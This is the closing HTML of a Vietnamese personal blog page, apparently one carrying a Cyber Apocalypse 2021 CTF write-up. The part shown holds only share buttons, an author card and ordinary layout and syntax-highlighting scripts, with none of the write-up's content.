            <a class="post-action-btn btn btn--default" href="#">
          
            <i class="fa fa-list"></i>
          </a>
        </li>
      </ul>
    
  </div>
  
      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="5">
  <i id="btn-close-shareoptions" class="fa fa-close"></i>
  <ul class="share-options">
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fmanhnv.com%2F2021%2F04%2Fcyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup%2F">
          <i class="fa fa-facebook-official"></i><span>Chia sẻ với Facebook</span>
        </a>
      </li>
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3A%2F%2Fmanhnv.com%2F2021%2F04%2Fcyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup%2F">
          <i class="fa fa-twitter"></i><span>Chia sẻ với Twitter</span>
        </a>
      </li>
    
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="https://manhnv.com/favicon.png" alt="Ảnh đại diện" />
    
    <h4 id="about-card-name">Manh NV</h4>
    
      <div id="about-card-bio">Chia sẻ là niềm vui</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Viết blog dạo
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        VietNam
      </div>
    
  </div>
</div>

    

    
  
    
      <div id="cover" style="background-image:url('https://manhnv.com/images/cover-v1.2.0.jpg');"></div>
    
  


    
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin="anonymous"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js" integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin="anonymous"></script>


<script src="https://manhnv.com/js/script-pcw6v3xilnxydl1vddzazdverrnn9ctynvnxgwho987mfyqkuylcb1nlt.min.js"></script>


  
    <script src="https://manhnv.com/js/scripts.js"></script>
  

<script lang="javascript">
window.onload = updateMinWidth;
window.onresize = updateMinWidth;
document.getElementById("sidebar").addEventListener("transitionend", updateMinWidth);
function updateMinWidth() {
  var sidebar = document.getElementById("sidebar");
  var main = document.getElementById("main");
  main.style.minWidth = "";
  var w1 = getComputedStyle(main).getPropertyValue("min-width");
  var w2 = getComputedStyle(sidebar).getPropertyValue("width");
  var w3 = getComputedStyle(sidebar).getPropertyValue("left");
  main.style.minWidth = `calc(${w1} - ${w2} - ${w3})`;
}
</script>

<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight > code, pre > code').each(function(i, block) {
    if (!$(this).hasClass('codeblock')) {
      $(this).addClass('codeblock');
    }
    hljs.highlightBlock(block);
  });
});
</script>


  
    
  




    
  </body>
</html>

